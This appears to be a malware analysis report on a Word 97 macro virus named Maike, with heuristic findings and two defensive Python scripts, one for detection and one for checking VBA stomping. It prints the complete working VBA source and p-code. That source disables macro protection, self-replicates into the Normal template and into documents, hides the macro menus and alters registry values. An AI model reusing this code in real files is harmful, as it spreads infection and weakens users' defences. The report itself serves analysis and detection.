Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ab5dca3099c70e71…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 31.0 KB
Created: 2003-03-02 08:11:00 (OLE SummaryInformation timestamp; it is trivially editable, so treat it as an indicator, not as evidence of when the file was made)
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2012-06-14
MD5: 9a19acba5da0f671f4cb6f4be2b98066
SHA-1: 0a6486cd6ed4235a862f09c943f2e66abf669667
SHA-256: ab5dca3099c70e7179b4000848ab1e48295b0b03c6190423124ea7b3e5c2f04f
Risk score: 196

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1137.001 Office Application Startup: Office Template Macros (added mapping: the code copies itself into the Normal template)
T1562.001 Impair Defenses: Disable or Modify Tools (added mapping: macro security level and VirusProtection are switched off)

The file is a Word document authored in Word 97 whose VBA project holds a module named Maike alongside ThisDocument. The module is wired to the AutoOpen and AutoClose auto macros and to the FileSave and FileSaveAs command overrides, so it runs on open, on close and on every save. Each run, under On Error Resume Next, does three things. First it lowers macro security: it writes HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level = 0 (the Word 2000 setting) through the WordBasic-compatible System.PrivateProfileString call, re-enables auto macros with WordBasic.DisableAutoMacros = 0, and sets Options.VirusProtection = False and Options.SaveNormalPrompt = False so the Normal template can be rewritten without a prompt. Second it exports its own module through the VBE object model (Application.VBE.ActiveVBProject.VBComponents("Maike").Export) to Maike.sys in the directory returned by GetSystemDirectoryA. Third it imports that file into whichever project lacks the module, NormalTemplate.VBProject or ActiveDocument.VBProject, which is the document-to-template-to-document replication pattern of the W97M family; AutoOpen then re-saves the document as wdFormatDocument so the infected copy is written back. Empty ToolsMacro, FileTemplates and ViewVBCode procedures override the Word menu commands a user would use to inspect or remove macros. On the 1st, 14th and 28th of the month the Love payload overwrites RegisteredOwner, RegisteredOrganization and ProductId under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion; the comments credit the author as Vampir and name the virus MAIKE.

Two caveats for the heuristic output below. The macros are VBA, not Word 6/95 WordBasic: the "legacy WordBasic" rule keys on names such as AutoOpen and ToolsMacro, which are present here as ordinary VBA procedures together with WordBasic compatibility calls, not as a hidden WordBasic macro stream. And the p-code disassembly appended to the extracted artifact carries the same string literals and call sequence as the decompressed source, so there is no sign of VBA stomping; the two differ only in a few identifier spellings in the disassembly (LBound$ where the source has Left$, New where it has Name), and the surrounding opcodes (InStr then Sub before the call, a string compare against "Maike") match the source logic, so these read as disassembler name-resolution artifacts rather than a second code path. The ClamAV detection Doc.Trojan.Ekaim-1 is consistent with this behaviour.

Heuristics (6)

  • ClamAV: Doc.Trojan.Ekaim-1 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Ekaim-1
  • VBA macros detected [medium, OLE_VBA_MACROS; 3 related findings]
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical, OLE_VBA_MACRO_VIRUS_REPLICATION]
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. In this sample the copy is made with VBComponents("Maike").Export to Maike.sys in the system directory followed by VBComponents.Import into whichever of NormalTemplate.VBProject or ActiveDocument.VBProject lacks the module; the line the rule matched is the protection switch-off.
    Matched line in script:
    Options.VirusProtection = False
  • AutoOpen macro [low, OLE_VBA_AUTOOPEN]
    Runs when the document is opened.
    Matched line in script:
    Sub AutoOpen()
  • AutoClose macro [low, OLE_VBA_AUTOCLOSE]
    Runs when the document is closed. The rule is labelled Auto_Close, which is the Excel form; Word's auto macro is AutoClose, and that is what the rule matched.
    Matched line in script:
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers [high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS]
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them. In this sample the markers are AutoOpen together with the ToolsMacro, FileTemplates and ViewVBCode stubs, all of which are VBA procedures that olevba did extract; the high severity reflects the menu-hiding intent, not a hidden WordBasic stream.
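The behaviours summarised in the insights and in the heuristic list above can be turned into a small rule set that runs over extracted VBA source. The scanner below is an added example written for this report; it is not part of the report's pipeline or of oletools. The rule IDs prefixed OLE_ are the report's own, while WORD_COMMAND_HOOK and MACRO_SECURITY_DOWNGRADE are names assumed for this example, and the VBA at the bottom is a constructed excerpt of the Maike module shown in the artifact, not the full file.

```python
"""Rule-based triage of extracted VBA source for W97M-style macro-virus
behaviour.  Added example for this report; not part of oletools.  Rule IDs
prefixed OLE_ are the report's own; WORD_COMMAND_HOOK and
MACRO_SECURITY_DOWNGRADE are names assumed here.  SAMPLE is a constructed
excerpt of the Maike source listed in the report."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule_id: str
    severity: str
    evidence: str  # first source line that matched the rule


# VBA is case-insensitive, so every pattern is compiled with re.I.
RULES = tuple(
    (rule_id, severity, re.compile(pattern, re.I))
    for rule_id, severity, pattern in (
        ("OLE_VBA_AUTOOPEN", "low",
         r"^\s*(?:public\s+|private\s+)?sub\s+autoopen\s*\("),
        ("OLE_VBA_AUTOCLOSE", "low",
         r"^\s*(?:public\s+|private\s+)?sub\s+autoclose\s*\("),
        # VBE object-model self-copy, or switching off Word's macro-virus protection
        ("OLE_VBA_MACRO_VIRUS_REPLICATION", "critical",
         r"vbcomponents\b.*\.(?:export|import|addfromstring)\b"
         r"|codemodule\b.*\.(?:insertlines|deletelines|addfromstring)\b"
         r"|\borganizercopy\b"
         r"|options\.virusprotection\s*=\s*false"),
        # Overrides of the Word menu commands a user would use to inspect macros
        ("OLE_LEGACY_WORDBASIC_MACRO_VIRUS", "high",
         r"^\s*sub\s+(?:toolsmacro|filetemplates|viewvbcode|macrofile|filemacro|globmacro)\s*\("),
        # Assumed ID: overrides of built-in file commands so the infector runs on each save/open
        ("WORD_COMMAND_HOOK", "medium",
         r"^\s*sub\s+(?:filesave|filesaveas|fileopen|filenew|fileclose|fileexit)\s*\("),
        # Assumed ID: macro-security downgrade via the registry or WordBasic compatibility calls
        ("MACRO_SECURITY_DOWNGRADE", "high",
         r"\\office\\\d+\.\d+\\word\\security.*\blevel\b"
         r"|wordbasic\.disableautomacros\s*=\s*0"),
    )
)


def scan(source: str) -> list[Finding]:
    """Return one Finding per rule, carrying the first line that triggered it."""
    found: dict[str, Finding] = {}
    for line in source.splitlines():
        if line.lstrip().startswith("'"):
            continue  # comment lines must not trigger rules
        for rule_id, severity, rx in RULES:
            if rule_id not in found and rx.search(line):
                found[rule_id] = Finding(rule_id, severity, line.strip())
    return list(found.values())


def verdict(findings: list[Finding]) -> str:
    """Self-replication plus an auto-execution entry point is the macro-virus signature."""
    ids = {f.rule_id for f in findings}
    auto_exec = ids & {"OLE_VBA_AUTOOPEN", "OLE_VBA_AUTOCLOSE", "WORD_COMMAND_HOOK"}
    if "OLE_VBA_MACRO_VIRUS_REPLICATION" in ids and auto_exec:
        return "malicious"
    if ids & {"OLE_VBA_MACRO_VIRUS_REPLICATION", "OLE_LEGACY_WORDBASIC_MACRO_VIRUS",
              "MACRO_SECURITY_DOWNGRADE"}:
        return "suspicious"
    return "review" if ids else "clean"


# Constructed excerpt of the Maike module from the report (not the full artifact).
SAMPLE = """\
Sub Maike()
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\9.0\\Word\\Security", "Level") = 0&
WordBasic.DisableAutoMacros = 0
Options.VirusProtection = False
Application.VBE.ActiveVBProject.VBComponents("Maike").Export sSysdir
MIMI.VBComponents.Import (sSysdir)
'               VIRIINAME: MAIKE
End Sub

Sub FileSave()
    Call Maike
    ActiveDocument.Save
End Sub

Sub AutoOpen()
    Call Maike
End Sub

Sub AutoClose()
    Call Maike
End Sub

Sub ToolsMacro()
    On Error Resume Next
End Sub
"""

if __name__ == "__main__":
    results = scan(SAMPLE)
    for f in sorted(results, key=lambda f: f.rule_id):
        print(f"{f.severity:8} {f.rule_id:34} {f.evidence}")
    print("verdict:", verdict(results))
```

Feed it the output of olevba (the decoded VBA source, as in the macros.bas artifact) rather than raw stream bytes; the WordBasic rule only sees procedure names that were extracted, which is exactly the gap the OLE_LEGACY_WORDBASIC_MACRO_VIRUS rule text warns about for real Word 6/95 templates.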

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8768 bytes
SHA-256: 21ca5081349eef28de5585db357ba5db105434e9b0ab6affb495dce0200739d5

Preview script: first 1,000 lines of the extracted script. The artifact is well under 400 lines, so nothing below is truncated. The decoded VBA source comes first (ThisDocument, then the Maike module); the commented block beginning at "Processing file:" is the pcodedmp-style p-code disassembly of the same two module streams, which olevba can append to its output and which is what Word actually executes.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Maike"
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Dim sSysdir As String

Sub Maike()
On Error Resume Next

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 0&

Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros = 0

Options.VirusProtection = False
Options.SaveNormalPrompt = False
 
 sSysdir = Space$(256)
 GetSystemDirectory sSysdir, Len(sSysdir)
 sSysdir = Left$(sSysdir, InStr(sSysdir, Chr$(0)) - 1)
 sSysdir = sSysdir + "\Maike.sys"

Application.VBE.ActiveVBProject.VBComponents("Maike").Export sSysdir

For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "Maike" Then NormInstall = True
Next I

For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "Maike" Then ActivInstall = True
Next I

If ActivInstall = True And NormInstall = False Then Set MIMI = NormalTemplate.VBProject _
Else If ActivInstall = False And NormInstall = True Then Set MIMI = ActiveDocument.VBProject
MIMI.VBComponents.Import (sSysdir)

If Day(Now()) = 1 Or Day(Now()) = 14 Or Day(Now()) = 28 Then Love

' This stupid Macro is coded from Vampir and many grezz to my friends and Maike the little good looking girl
'               VIRIINAME: MAIKE
End Sub

Sub Love()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Maike you are": System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "the most beautiful": System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "ProductId") = "girl in the world"
End Sub

Sub suppe()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub


Sub FileSave()
    On Error Resume Next
    Call Maike
    ActiveDocument.Save
End Sub
Sub FileSaveAs()
    On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
    Call Maike
End Sub

Sub AutoOpen()
    On Error Resume Next
    Call Maike
    Call suppe
End Sub

Sub AutoClose()
    On Error Resume Next
    Call Maike
End Sub

Sub ToolsMacro()
    On Error Resume Next
End Sub
Sub FileTemplates()
    On Error Resume Next
End Sub
Sub ViewVBCode()
    On Error Resume Next
End Sub


' Processing file: /tmp/qstore_4_4eyeal
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Maike - 5257 bytes
' Line #0:
' 	FuncDefn (Private Declare Function GetSystemDirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #1:
' 	Dim 
' 	VarDefn sSysdir (As String)
' Line #2:
' Line #3:
' 	FuncDefn (Sub Maike())
' Line #4:
' 	OnError (Resume Next) 
' Line #5:
' Line #6:
' 	LitDI4 0x0000 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #7:
' Line #8:
' 	Ld wdAlertsNone 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #9:
' 	LitDI2 0x0000 
' 	Ld WordBasic 
' 	MemSt DisableAutoMacros 
' Line #10:
' Line #11:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #12:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #13:
' Line #14:
' 	LitDI2 0x0100 
' 	ArgsLd Space$ 0x0001 
' 	St sSysdir 
' Line #15:
' 	Ld sSysdir 
' 	Ld sSysdir 
' 	FnLen 
' 	ArgsCall GetSystemDirectory 0x0002 
' Line #16:
' 	Ld sSysdir 
' 	Ld sSysdir 
' 	LitDI2 0x0000 
' 	ArgsLd Chr$ 0x0001 
' 	FnInStr 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd LBound$ 0x0002 
' 	St sSysdir 
' Line #17:
' 	Ld sSysdir 
' 	LitStr 0x000A "\Maike.sys"
' 	Add 
' 	St sSysdir 
' Line #18:
' Line #19:
' 	Ld sSysdir 
' 	LitStr 0x0005 "Maike"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #20:
' Line #21:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #22:
' 	Ld I 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0005 "Maike"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St NormInstall 
' 	EndIf 
' Line #23:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	NextVar 
' Line #24:
' Line #25:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #26:
' 	Ld I 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0005 "Maike"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitVarSpecial (True)
' 	St ActivInstall 
' 	EndIf 
' Line #27:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	NextVar 
' Line #28:
' Line #29:
' 	LineCont 0x0004 0F 00 00 00
' 	Ld ActivInstall 
' 	LitVarSpecial (True)
' 	Eq 
' 	Ld NormInstall 
' 	LitVarSpecial (False)
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	Set MIMI 
' 	Else 
' 	BoSImplicit 
' 	Ld ActivInstall 
' 	LitVarSpecial (False)
' 	Eq 
' 	Ld NormInstall 
' 	LitVarSpecial (True)
' 	Eq 
' 	And 
' 	If 
' 	BoSImplicit 
' 	SetStmt 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	Set MIMI 
' 	EndIf 
' 	EndIf 
' Line #30:
' 	Ld sSysdir 
' 	Paren 
' 	Ld MIMI 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #31:
' Line #32:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0001 
' 	Eq 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x000E 
' 	Eq 
' 	Or 
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x001C 
' 	Eq 
' 	Or 
' 	If 
' 	BoSImplicit 
' 	ArgsCall Love 0x0000 
' 	EndIf 
' Line #33:
' Line #34:
' 	QuoteRem 0x0000 0x006B " This stupid Macro is coded from Vampir and many grezz to my friends and Maike the little good looking girl"
' Line #35:
' 	QuoteRem 0x0000 0x001F "               VIRIINAME: MAIKE"
' Line #36:
' 	EndSub 
' Line #37:
' Line #38:
' 	FuncDefn (Sub Love())
' Line #39:
' 	LitStr 0x000D "Maike you are"
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x000F "RegisteredOwner"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' 	BoS 0x0000 
' 	LitStr 0x0012 "the most beautiful"
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x0016 "RegisteredOrganization"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' 	BoS 0x0000 
' 	LitStr 0x0011 "girl in the world"
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x0009 "ProductId"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #40:
' 	EndSub 
' Line #41:
' Line #42:
' 	FuncDefn (Sub suppe())
' Line #43:
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	ParamNamed FileName 
' 	Ld wdFormatDocument 
' 	ParamNamed FileFormat 
' 	Ld ActiveDocument 
' 	ArgsMemCall SaveAs 0x0002 
' Line #44:
' 	EndSub 
' Line #45:
' Line #46:
' Line #47:
' 	FuncDefn (Sub FileSave())
' Line #48:
' 	OnError (Resume Next) 
' Line #49:
' 	ArgsCall (Call) Maike 0x0000 
' Line #50:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #51:
' 	EndSub 
' Line #52:
' 	FuncDefn (Sub FileSaveAs())
' Line #53:
' 	OnError (Resume Next) 
' Line #54:
' 	Ld wdDialogFileSaveAs 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #55:
' 	ArgsCall (Call) Maike 0x0000 
' Line #56:
' 	EndSub 
' Line #57:
' Line #58:
' 	FuncDefn (Sub AutoOpen())
' Line #59:
' 	OnError (Resume Next) 
' Line #60:
' 	ArgsCall (Call) Maike 0x0000 
' Line #61:
' 	ArgsCall (Call) suppe 0x0000 
' Line #62:
' 	EndSub 
' Line #63:
' Line #64:
' 	FuncDefn (Sub AutoClose())
' Line #65:
' 	OnError (Resume Next) 
' Line #66:
' 	ArgsCall (Call) Maike 0x0000 
' Line #67:
' 	EndSub 
' Line #68:
' Line #69:
' 	FuncDefn (Sub ToolsMacro())
' Line #70:
' 	OnError (Resume Next) 
' Line #71:
' 	EndSub 
' Line #72:
' 	FuncDefn (Sub FileTemplates())
' Line #73:
' 	OnError (Resume Next) 
' Line #74:
' 	EndSub 
' Line #75:
' 	FuncDefn (Sub ViewVBCode())
' Line #76:
' 	OnError (Resume Next) 
' Line #77:
' 	EndSub 
' Line #78:
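The p-code listing above is worth more than its length suggests: Word runs the compiled p-code, and the decompressed source stream is only what a reader sees, so comparing the two is the standard check for VBA stomping (a benign source stream left over a malicious p-code stream). The cross-check below is an added example written for this report, not part of oletools or pcodedmp; the two excerpts it carries are constructed from the Maike source and listing shown above.

```python
"""Cross-check a pcodedmp-style p-code listing against decompressed VBA source.
Added example for this report; not part of oletools or pcodedmp.  SOURCE and
PCODE are constructed excerpts of the Maike artifact listed in the report."""
import re

# pcodedmp emits one opcode per line; olevba prefixes each line with "' " when
# it appends the listing to the extracted source, so the prefix is optional.
_LITSTR = re.compile(r"^\s*'?\s*LitStr\s+0x[0-9A-Fa-f]+\s+\"(.*)\"\s*$")
_IDENT_OP = re.compile(
    r"^\s*'?\s*(?:ArgsMemCall|ArgsMemLd|ArgsMemSt|MemLd|MemSt|Ld|St|ArgsCall|ArgsLd)"
    r"\s+(?:\(Call\)\s+)?(\S+)")
_SRC_STRING = re.compile(r"\"([^\"]*)\"")
_SRC_IDENT = re.compile(r"[A-Za-z_]\w*[$%&!#]?")  # VBA names may carry a type suffix


def pcode_symbols(listing: str) -> tuple[set[str], set[str]]:
    """String literals and referenced identifiers taken from a p-code listing."""
    strings, idents = set(), set()
    for line in listing.splitlines():
        m = _LITSTR.match(line)
        if m:
            strings.add(m.group(1))
            continue
        m = _IDENT_OP.match(line)
        if m:
            idents.add(m.group(1))
    return strings, idents


def source_symbols(source: str) -> tuple[set[str], set[str]]:
    """String literals and identifiers (lower-cased, VBA being case-insensitive)."""
    strings, idents = set(), set()
    for line in source.splitlines():
        if line.lstrip().startswith("'"):
            continue  # comment-only line
        strings.update(_SRC_STRING.findall(line))
        idents.update(t.lower() for t in _SRC_IDENT.findall(line))
    return strings, idents


def cross_check(source: str, listing: str) -> dict[str, set[str]]:
    """Everything the p-code references that the source stream does not contain."""
    src_strings, src_idents = source_symbols(source)
    pc_strings, pc_idents = pcode_symbols(listing)
    return {
        "strings_only_in_pcode": pc_strings - src_strings,
        "idents_only_in_pcode": {i for i in pc_idents if i.lower() not in src_idents},
    }


def looks_stomped(report: dict[str, set[str]]) -> bool:
    """Literals come verbatim from the p-code, so a literal the source lacks is
    the strong signal.  Identifier-only gaps are left for manual review, because
    the disassembler's name resolution can be off (the report's listing shows
    New where the source has Name)."""
    return bool(report["strings_only_in_pcode"])


# Constructed excerpt of the decompressed Maike source from the report.
SOURCE = """\
Sub Maike()
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\9.0\\Word\\Security", "Level") = 0&
Options.VirusProtection = False
 sSysdir = sSysdir + "\\Maike.sys"
Application.VBE.ActiveVBProject.VBComponents("Maike").Export sSysdir
For I = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(I).Name = "Maike" Then NormInstall = True
Next I
End Sub
"""

# Constructed excerpt of the matching p-code lines from the report's listing.
PCODE = """\
' Line #6:
'   LitDI4 0x0000 0x0000
'   LitStr 0x0000 ""
'   LitStr 0x003D "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\9.0\\Word\\Security"
'   LitStr 0x0005 "Level"
'   Ld System
'   ArgsMemSt PrivateProfileString 0x0003
' Line #11:
'   LitVarSpecial (False)
'   Ld Options
'   MemSt VirusProtection
' Line #17:
'   Ld sSysdir
'   LitStr 0x000A "\\Maike.sys"
'   Add
'   St sSysdir
' Line #19:
'   Ld sSysdir
'   LitStr 0x0005 "Maike"
'   Ld Application
'   MemLd VBE
'   MemLd ActiveVBProject
'   ArgsMemLd VBComponents 0x0001
'   ArgsMemCall Export 0x0001
' Line #22:
'   Ld I
'   Ld NormalTemplate
'   MemLd VBProject
'   ArgsMemLd VBComponents 0x0001
'   MemLd New
'   LitStr 0x0005 "Maike"
'   Eq
"""

if __name__ == "__main__":
    report = cross_check(SOURCE, PCODE)
    print(report, "stomped:", looks_stomped(report))
```

On the report's own excerpt every p-code literal is present in the source and the only identifier gap is New (the source has Name), which is the review-only discrepancy noted in the insights; swapping the source for a benign stub makes the registry path and "Maike" literals show up as p-code-only and flips the verdict.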